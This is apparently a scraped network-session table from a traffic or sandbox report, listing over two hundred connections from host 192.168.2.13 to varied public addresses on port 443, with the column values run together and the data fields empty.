                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14386192.168.2.1351812134.250.164.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14387192.168.2.1360508128.123.183.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14388192.168.2.135051044.63.211.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14389192.168.2.1357944150.249.163.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14390192.168.2.1343338162.183.236.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14391192.168.2.1357380208.216.31.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14392192.168.2.133698639.97.232.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14393192.168.2.1360400181.177.191.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14394192.168.2.135739062.216.161.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14395192.168.2.13520504.34.119.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14396192.168.2.1334902213.64.126.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14397192.168.2.1342736112.234.16.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14398192.168.2.134912681.101.13.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14399192.168.2.135743048.116.102.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14400192.168.2.1359954179.66.26.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14401192.168.2.1345870187.186.245.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14402192.168.2.1351074176.151.239.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14403192.168.2.133596653.163.82.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14404192.168.2.1343910208.93.134.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14405192.168.2.1335654177.7.62.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14406192.168.2.134392693.153.180.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14407192.168.2.134086639.228.187.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14408192.168.2.135400483.121.196.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14409192.168.2.1354526149.218.162.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14410192.168.2.1335466187.238.113.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14411192.168.2.135820644.255.46.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14412192.168.2.133673420.78.242.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14413192.168.2.1338308221.20.137.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14414192.168.2.1338902223.183.209.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14415192.168.2.1358758130.137.219.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14416192.168.2.1337156126.179.189.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14417192.168.2.134043697.254.41.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14418192.168.2.1351288144.116.248.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14419192.168.2.134429485.7.147.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14420192.168.2.1355566203.185.37.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14421192.168.2.133600291.4.196.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14422192.168.2.13463668.164.128.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14423192.168.2.1351112134.149.115.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14424192.168.2.1339058176.110.62.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14425192.168.2.1353844141.107.157.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14426192.168.2.134303258.222.122.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14427192.168.2.135211857.107.132.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14428192.168.2.1333008168.106.188.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14429192.168.2.13549881.149.42.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14430192.168.2.1339154222.7.230.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14431192.168.2.1340244106.45.134.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14432192.168.2.134558649.93.244.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14433192.168.2.1337694200.212.168.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14434192.168.2.1351644194.79.18.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14435192.168.2.1344724135.150.153.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14436192.168.2.1339550153.140.4.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14437192.168.2.1335690217.238.233.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14438192.168.2.135884472.241.196.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14439192.168.2.1343256134.198.27.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14440192.168.2.1346784194.148.8.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14441192.168.2.136022470.55.247.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14442192.168.2.135817894.77.213.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14443192.168.2.1355054150.184.113.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14444192.168.2.1342082136.0.206.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14445192.168.2.134694857.214.110.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14446192.168.2.134735667.16.59.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14447192.168.2.135297670.8.184.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14448192.168.2.1332884188.152.111.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14449192.168.2.13597349.196.171.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14450192.168.2.133800844.131.214.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14451192.168.2.134111458.224.128.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14452192.168.2.1335550103.129.25.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14453192.168.2.1360874131.119.163.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14454192.168.2.133784672.143.104.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14455192.168.2.1349316159.164.237.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14456192.168.2.1353540106.83.198.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14457192.168.2.1345558129.19.111.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14458192.168.2.133847277.226.33.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14459192.168.2.134140642.143.5.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14460192.168.2.134418081.61.153.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14461192.168.2.1352190163.232.196.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14462192.168.2.133402268.32.145.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14463192.168.2.1340632151.81.155.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14464192.168.2.134007475.217.184.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14465192.168.2.1356354135.155.90.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14466192.168.2.1359428222.32.181.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14467192.168.2.1347476181.68.245.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14468192.168.2.133717051.109.94.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14469192.168.2.1334160121.186.56.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14470192.168.2.1338710142.149.232.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14471192.168.2.1333242103.181.213.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14472192.168.2.1340712100.31.41.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14473192.168.2.134829446.71.108.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14474192.168.2.134050871.117.206.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14475192.168.2.135951632.236.25.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14476192.168.2.1347776197.104.18.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14477192.168.2.1338534198.61.29.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14478192.168.2.1359038212.223.101.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14479192.168.2.1337050182.210.9.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14480192.168.2.1342636107.73.239.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14481192.168.2.135071497.68.185.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14482192.168.2.1352544102.236.214.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14483192.168.2.1337742209.237.75.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14484192.168.2.1335900145.238.194.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14485192.168.2.1351986144.243.190.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14486192.168.2.1342966179.215.47.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14487192.168.2.1347904109.70.184.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14488192.168.2.1344682170.77.76.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14489192.168.2.135046485.255.103.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14490192.168.2.1335302209.213.51.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14491192.168.2.133759414.163.231.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14492192.168.2.1354898109.73.172.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14493192.168.2.135918439.128.227.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14494192.168.2.135632039.222.146.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14495192.168.2.1351022119.128.159.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14496192.168.2.1333298115.56.136.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14497192.168.2.13385221.113.108.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14498192.168.2.1333462191.154.69.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14499192.168.2.1355124136.178.163.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14500192.168.2.1346812211.255.89.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14501192.168.2.1333946163.232.90.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14502192.168.2.134813087.0.160.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14503192.168.2.1339810169.174.38.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14504192.168.2.1341056223.204.171.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14505192.168.2.1338516161.7.178.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14506192.168.2.134515258.46.88.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14507192.168.2.135806813.205.138.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14508192.168.2.1356058178.254.218.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14509192.168.2.1353352165.139.223.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14510192.168.2.1357746141.151.250.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14511192.168.2.1349190211.117.37.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14512192.168.2.1338224136.178.10.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14513192.168.2.134822298.166.57.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14514192.168.2.1336566108.55.254.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14515192.168.2.136010018.96.153.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14516192.168.2.1349464176.33.183.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14517192.168.2.1339908143.41.141.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14518192.168.2.1352818107.219.87.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14519192.168.2.1346670170.182.60.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14520192.168.2.134640097.199.107.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14521192.168.2.1340730165.222.171.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14522192.168.2.1357818146.110.3.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14523192.168.2.1335294194.128.123.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14524192.168.2.134507835.33.66.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14525192.168.2.1333284160.81.130.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14526192.168.2.133576813.172.239.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14527192.168.2.133483642.139.141.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14528192.168.2.135927294.226.121.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14529192.168.2.1338234198.38.123.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14530192.168.2.1353366151.17.174.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14531192.168.2.133828858.198.92.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14532192.168.2.1354080146.168.68.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14533192.168.2.135666299.154.229.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14534192.168.2.134889268.182.162.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14535192.168.2.133960036.109.103.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14536192.168.2.1345830139.143.107.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14537192.168.2.1349844218.91.212.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14538192.168.2.1336220101.192.147.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14539192.168.2.135551627.103.64.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14540192.168.2.1341138219.32.109.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14541192.168.2.134603486.178.15.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14542192.168.2.134602072.229.123.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14543192.168.2.1342834183.90.199.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14544192.168.2.133988866.110.121.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14545192.168.2.1351816124.209.196.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14546192.168.2.133908886.43.191.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14547192.168.2.1357280105.77.11.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14548192.168.2.1350368160.47.108.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14549192.168.2.133483427.28.173.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14550192.168.2.135090247.68.132.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14551192.168.2.13404902.186.119.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14552192.168.2.1359752148.130.48.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14553192.168.2.1343646164.87.12.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14554192.168.2.133470059.116.93.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14555192.168.2.135719650.60.134.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14556192.168.2.1341246150.62.219.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14557192.168.2.1351364219.181.27.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14558192.168.2.1351974104.195.240.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14559192.168.2.13344468.173.17.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14560192.168.2.1349874172.240.144.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14561192.168.2.1349162102.40.54.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14562192.168.2.133351419.138.250.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14563192.168.2.1335060131.19.250.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14564192.168.2.1342288209.223.173.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14565192.168.2.1339408179.207.99.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14566192.168.2.1360544104.99.231.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14567192.168.2.1336204101.142.24.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14568192.168.2.1356388217.106.56.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14569192.168.2.133711839.209.130.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14570192.168.2.1345770102.122.83.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14571192.168.2.1340484129.135.30.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14572192.168.2.1348646191.138.254.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14573192.168.2.1346304142.186.216.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14574192.168.2.1357252191.13.82.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14575192.168.2.133646651.101.63.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14576192.168.2.1332768155.215.59.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14577192.168.2.134569413.155.106.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14578192.168.2.1337430211.194.123.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14579192.168.2.1360802166.211.98.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14580192.168.2.1341258167.90.195.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14581192.168.2.1350966105.5.247.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14582192.168.2.135083234.251.157.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14583192.168.2.13475949.249.99.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14584192.168.2.135520846.150.187.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14585192.168.2.135421243.237.13.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14586192.168.2.135697496.89.198.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14587192.168.2.1350672220.203.171.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14588192.168.2.134839097.162.14.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14589192.168.2.1345414125.41.141.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14590192.168.2.1343766146.249.240.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14591192.168.2.1350048119.35.209.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14592192.168.2.135522685.56.18.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14593192.168.2.1337316221.194.180.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14594192.168.2.13585669.38.203.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14595192.168.2.134984295.99.10.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14596192.168.2.1339880189.123.112.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14597192.168.2.13608469.166.217.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14598192.168.2.1346846122.38.89.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14599192.168.2.1358744120.86.188.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14600192.168.2.1349242117.136.251.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14601192.168.2.134100831.142.223.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14602192.168.2.1356328207.73.199.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14603192.168.2.1333008129.242.1.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14604192.168.2.1344634147.108.246.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14605192.168.2.1333700142.97.84.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14606192.168.2.134083044.81.142.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14607192.168.2.133700031.250.91.69443
